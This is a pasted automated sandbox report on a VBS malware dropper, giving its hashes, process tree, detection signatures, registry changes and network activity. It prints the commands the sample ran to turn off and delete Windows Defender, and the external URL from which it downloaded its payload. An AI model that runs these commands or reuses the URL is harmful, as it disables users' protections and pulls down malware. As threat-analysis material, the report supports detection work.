paladin316

VBS_40216b4cb0fa09224def2f72bdc4c922_php_2019-06-26_10_30.json

Jun 26th, 2019
2,159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.31 KB | None | 0 0
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "VBS_40216b4cb0fa09224def2f72bdc4c922.php"
  7. [*] File Size: 71208
  8. [*] File Type: "Zip archive data, at least v2.0 to extract"
  9. [*] SHA256: "3bb0ff8c495e38b5f03abff3a0453bdc6f0622141c662fd91a07a4be0aac4699"
  10. [*] MD5: "40216b4cb0fa09224def2f72bdc4c922"
  11. [*] SHA1: "fd9b4c2795b7d6289ccf79f0e2e9e7779b4d08e0"
  12. [*] SHA512: "15a13e66c53846d3b33c7c042f4905065d8c2d413f781623933aaf6b6fe61e38dc892f50593dc8d496219c8c653a8f0382197587f6880beb5c56e1607a666065"
  13. [*] CRC32: "8110944A"
  14. [*] SSDEEP: "1536:1pRPWLhV6ljypRIjtDl+ccRtr6dcML0bUObtJZn3zxkGep6:1AV665RV62MLQpX3zdeQ"
  15.  
  16. [*] Process Execution: [
  17. "wscript.exe",
  18. "dr.exe",
  19. "cmd.exe",
  20. "powershell.exe",
  21. "cmd.exe",
  22. "sc.exe",
  23. "cmd.exe",
  24. "sc.exe",
  25. "cmd.exe",
  26. "sc.exe",
  27. "cmd.exe",
  28. "sc.exe",
  29. "cmd.exe",
  30. "powershell.exe",
  31. "svchost.exe",
  32. "services.exe",
  33. "svchost.exe",
  34. "mscorsvw.exe",
  35. "lsass.exe",
  36. "sppsvc.exe",
  37. "svchost.exe",
  38. "svchost.exe",
  39. "explorer.exe"
  40. ]
  41.  
  42. [*] Signatures Detected: [
  43. {
  44. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  45. "Details": [
  46. {
  47. "IP": "185.94.230.114:80"
  48. }
  49. ]
  50. },
  51. {
  52. "Description": "Creates RWX memory",
  53. "Details": []
  54. },
  55. {
  56. "Description": "Possible date expiration check, exits too soon after checking local time",
  57. "Details": [
  58. {
  59. "process": "cmd.exe, PID 2372"
  60. }
  61. ]
  62. },
  63. {
  64. "Description": "A process attempted to delay the analysis task.",
  65. "Details": [
  66. {
  67. "Process": "sppsvc.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  68. }
  69. ]
  70. },
  71. {
  72. "Description": "A process created a hidden window",
  73. "Details": [
  74. {
  75. "Process": "dr.exe -> cmd"
  76. },
  77. {
  78. "Process": "dr.exe -> cmd"
  79. },
  80. {
  81. "Process": "dr.exe -> cmd"
  82. }
  83. ]
  84. },
  85. {
  86. "Description": "Drops a binary and executes it",
  87. "Details": [
  88. {
  89. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe"
  90. }
  91. ]
  92. },
  93. {
  94. "Description": "Performs some HTTP requests",
  95. "Details": [
  96. {
  97. "url": "http://bootiky.com/Dree9238.JPG"
  98. }
  99. ]
  100. },
  101. {
  102. "Description": "Queries information on disks, possibly for anti-virtualization",
  103. "Details": []
  104. },
  105. {
  106. "Description": "Attempts to stop active services",
  107. "Details": [
  108. {
  109. "servicename": "WinDefend"
  110. }
  111. ]
  112. },
  113. {
  114. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  115. "Details": [
  116. {
  117. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 12535110 times"
  118. }
  119. ]
  120. },
  121. {
  122. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
  123. "Details": [
  124. {
  125. "modified_name": "svchost.exe",
  126. "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  127. "original_name": "svchost.exe",
  128. "original_path": "C:\\Windows\\system32\\svchost.exe"
  129. }
  130. ]
  131. },
  132. {
  133. "Description": "Creates a hidden or system file",
  134. "Details": [
  135. {
  136. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1ddffeb.TMP"
  137. }
  138. ]
  139. },
  140. {
  141. "Description": "Attempts to disable Windows Defender",
  142. "Details": []
  143. },
  144. {
  145. "Description": "Attempts to modify or disable Security Center warnings",
  146. "Details": []
  147. }
  148. ]
  149.  
  150. [*] Started Service: [
  151. "KeyIso"
  152. ]
  153.  
  154. [*] Executed Commands: [
  155. "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  156. "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  157. "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  158. "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
  159. "cmd /c sc stop WinDefend",
  160. "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
  161. "cmd /c sc delete WinDefend",
  162. "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
  163. "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
  164. "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  165. "C:\\Windows\\system32\\svchost.exe",
  166. "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  167. "sc stop WinDefend",
  168. "sc delete WinDefend",
  169. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorsvw.exe",
  170. "C:\\Windows\\system32\\lsass.exe",
  171. "C:\\Windows\\system32\\sppsvc.exe"
  172. ]
  173.  
  174. [*] Mutexes: [
  175. "Local\\ZoneAttributeCacheCounterMutex",
  176. "Local\\ZonesCacheCounterMutex",
  177. "Local\\ZonesLockedCacheCounterMutex",
  178. "Global\\CLR_CASOFF_MUTEX",
  179. "Global\\838B6C9EB27932960"
  180. ]
  181.  
  182. [*] Modified Files: [
  183. "C:\\Users\\user\\AppData\\Local\\Temp\\dr.exe",
  184. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
  185. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  186. "\\??\\PIPE\\srvsvc",
  187. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\WA6FF8U5TQ89MIP6FVAF.temp",
  188. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1ddffeb.TMP",
  189. "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  190. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\GLXPEOORLATQGD8MN2Z6.temp",
  191. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  192. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen_service.lock",
  193. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen_service.log",
  194. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngenservicelock.dat",
  195. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngenrootstorelock.dat",
  196. "C:\\Windows\\Microsoft.NET\\ngenservice_pri3_lock.dat",
  197. "\\??\\SPDevice",
  198. "\\??\\PIPE\\wkssvc",
  199. "C:\\Windows\\sysnative\\winevt\\Logs\\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx",
  200. "C:\\Windows\\SoftwareDistribution\\ReportingEvents.log"
  201. ]
  202.  
  203. [*] Deleted Files: [
  204. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1ddffeb.TMP",
  205. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1048.31326734",
  206. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1048.31326750",
  207. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1048.31326750",
  208. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\GLXPEOORLATQGD8MN2Z6.temp",
  209. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1328.31347734",
  210. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1328.31347734",
  211. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1328.31347734",
  212. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngenserviceclientlock.dat",
  213. "C:\\Windows\\Microsoft.NET\\ngenservice_pri0_lock.dat",
  214. "C:\\Windows\\Microsoft.NET\\ngenservice_pri1_lock.dat",
  215. "C:\\Windows\\Microsoft.NET\\ngenservice_pri2_lock.dat"
  216. ]
  217.  
  218. [*] Modified Registry Keys: [
  219. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  220. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  221. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
  222. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
  223. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  224. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
  225. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
  226. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
  227. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
  228. "DisableNotifications",
  229. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  230. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\clr_optimization_v2.0.50727_32\\Start",
  231. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\clr_optimization_v2.0.50727_64\\Start",
  232. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  233. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727\\NGENService\\Roots\\Accessibility, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil\\3",
  234. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727\\NGENService\\Roots\\Accessibility, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil\\3\\Scenario",
  235. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727\\NGENService\\Roots\\Accessibility, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil\\3\\Status",
  236. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727\\NGENService\\Roots\\Accessibility, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil\\2\\Status",
  237. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727\\NGENService\\Roots\\Accessibility, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil\\3\\ImageList",
  238. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform\\ServiceSessionId",
  239. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Security Center\\cval",
  240. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Publishers\\{945a8954-c147-4acd-923f-40c45405a658}\\Enabled",
  241. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  242. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Reporting\\RebootWatch",
  243. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update\\NextSqmReportTime",
  244. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\SusClientIdValidation",
  245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\{E8433B72-5842-4d43-8645-BC2C35960837}.check.106\\CheckSetting",
  246. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\\CheckSetting",
  247. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\{E8433B72-5842-4d43-8645-BC2C35960837}.check.103\\CheckSetting",
  248. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\\CheckSetting",
  249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\\CheckSetting",
  250. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\{E8433B72-5842-4d43-8645-BC2C35960837}.check.104\\CheckSetting",
  251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\{945a8954-c147-4acd-923f-40c45405a658}.check.42\\CheckSetting",
  252. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\WHCIconStartup",
  253. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.bmp\\OpenWithProgids\\Paint.Picture",
  254. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.cab\\OpenWithProgids\\CABFolder",
  255. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.contact\\OpenWithProgids\\contact_wab_auto_file",
  256. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.css\\OpenWithProgids\\CSSfile",
  257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.csv\\OpenWithProgids\\Excel.CSV",
  258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dib\\OpenWithProgids\\Paint.Picture",
  259. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dll\\OpenWithProgids\\dllfile",
  260. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithProgids\\Word.Document.8",
  261. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.docm\\OpenWithProgids\\Word.DocumentMacroEnabled.12",
  262. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.docx\\OpenWithProgids\\Word.Document.12",
  263. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dot\\OpenWithProgids\\Word.Template.8",
  264. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dotm\\OpenWithProgids\\Word.TemplateMacroEnabled.12",
  265. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dotx\\OpenWithProgids\\Word.Template.12",
  266. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dwfx\\OpenWithProgids\\Windows.XPSReachViewer",
  267. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.easmx\\OpenWithProgids\\Windows.XPSReachViewer",
  268. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.edrwx\\OpenWithProgids\\Windows.XPSReachViewer",
  269. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.emf\\OpenWithProgids\\emffile",
  270. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.eprtx\\OpenWithProgids\\Windows.XPSReachViewer",
  271. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.exe\\OpenWithProgids\\exefile",
  272. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.fon\\OpenWithProgids\\fonfile",
  273. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.gif\\OpenWithProgids\\giffile",
  274. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.htm\\OpenWithProgids\\ChromeHTML",
  275. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.html\\OpenWithProgids\\ChromeHTML",
  276. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ico\\OpenWithProgids\\icofile",
  277. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ini\\OpenWithProgids\\inifile",
  278. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jfif\\OpenWithProgids\\pjpegfile",
  279. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jpe\\OpenWithProgids\\jpegfile",
  280. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jpeg\\OpenWithProgids\\jpegfile",
  281. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jpg\\OpenWithProgids\\jpegfile",
  282. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jtx\\OpenWithProgids\\Windows.XPSReachViewer",
  283. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.lnk\\OpenWithProgids\\lnkfile",
  284. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.mht\\OpenWithProgids\\mhtmlfile",
  285. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.mhtml\\OpenWithProgids\\mhtmlfile",
  286. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.msg\\OpenWithProgids\\Outlook.File.msg.15",
  287. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ocx\\OpenWithProgids\\ocxfile",
  288. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.odt\\OpenWithProgids\\Word.OpenDocumentText.12",
  289. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.otf\\OpenWithProgids\\otffile",
  290. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.png\\OpenWithProgids\\pngfile",
  291. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pot\\OpenWithProgids\\PowerPoint.Template.8",
  292. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.potm\\OpenWithProgids\\PowerPoint.TemplateMacroEnabled.12",
  293. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.potx\\OpenWithProgids\\PowerPoint.Template.12",
  294. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppam\\OpenWithProgids\\PowerPoint.Addin.12",
  295. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppsm\\OpenWithProgids\\PowerPoint.SlideShowMacroEnabled.12",
  296. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppsx\\OpenWithProgids\\PowerPoint.SlideShow.12",
  297. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppt\\OpenWithProgids\\PowerPoint.Show.8",
  298. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pptm\\OpenWithProgids\\PowerPoint.ShowMacroEnabled.12",
  299. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pptx\\OpenWithProgids\\PowerPoint.Show.12",
  300. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ps1xml\\OpenWithProgids\\Microsoft.PowerShellXMLData.1",
  301. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.rle\\OpenWithProgids\\rlefile",
  302. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.rtf\\OpenWithProgids\\Word.RTF.8",
  303. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.scf\\OpenWithProgids\\SHCmdFile",
  304. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.search-ms\\OpenWithProgids\\SearchFolder",
  305. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.shtml\\OpenWithProgids\\ChromeHTML",
  306. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sldm\\OpenWithProgids\\PowerPoint.SlideMacroEnabled.12",
  307. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sldx\\OpenWithProgids\\PowerPoint.Slide.12",
  308. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sys\\OpenWithProgids\\sysfile",
  309. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.tif\\OpenWithProgids\\TIFImage.Document",
  310. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.tiff\\OpenWithProgids\\TIFImage.Document",
  311. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ttc\\OpenWithProgids\\ttcfile",
  312. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ttf\\OpenWithProgids\\ttffile",
  313. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.txt\\OpenWithProgids\\txtfile",
  314. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.vsto\\OpenWithProgids\\bootstrap.vsto.1",
  315. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.wdp\\OpenWithProgids\\wdpfile",
  316. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.wmf\\OpenWithProgids\\wmffile",
  317. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlam\\OpenWithProgids\\Excel.AddInMacroEnabled",
  318. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xls\\OpenWithProgids\\Excel.Sheet.8",
  319. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlsb\\OpenWithProgids\\Excel.SheetBinaryMacroEnabled.12",
  320. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlsm\\OpenWithProgids\\Excel.SheetMacroEnabled.12",
  321. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlsx\\OpenWithProgids\\Excel.Sheet.12",
  322. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlt\\OpenWithProgids\\Excel.Template.8",
  323. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xltm\\OpenWithProgids\\Excel.TemplateMacroEnabled",
  324. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xltx\\OpenWithProgids\\Excel.Template",
  325. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xml\\OpenWithProgids\\xmlfile",
  326. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xps\\OpenWithProgids\\Windows.XPSReachViewer",
  327. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xsl\\OpenWithProgids\\xslfile",
  328. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.zip\\OpenWithProgids\\CompressedFolder",
  329. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\pzq.rkr",
  330. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA"
  331. ]
  332.  
  333. [*] Deleted Registry Keys: [
  334. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  335. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  336. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  337. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  338. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\AccountDomainSid"
  339. ]
  340.  
  341. [*] DNS Communications: [
  342. {
  343. "type": "A",
  344. "request": "bootiky.com",
  345. "answers": [
  346. {
  347. "data": "185.94.230.114",
  348. "type": "A"
  349. }
  350. ]
  351. }
  352. ]
  353.  
  354. [*] Domains: [
  355. {
  356. "ip": "185.94.230.114",
  357. "domain": "bootiky.com"
  358. }
  359. ]
  360.  
  361. [*] Network Communication - ICMP: []
  362.  
  363. [*] Network Communication - HTTP: [
  364. {
  365. "count": 1,
  366. "body": "",
  367. "uri": "http://bootiky.com/Dree9238.JPG",
  368. "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
  369. "method": "GET",
  370. "host": "bootiky.com",
  371. "version": "1.1",
  372. "path": "/Dree9238.JPG",
  373. "data": "GET /Dree9238.JPG HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: bootiky.com\r\n\r\n",
  374. "port": 80
  375. }
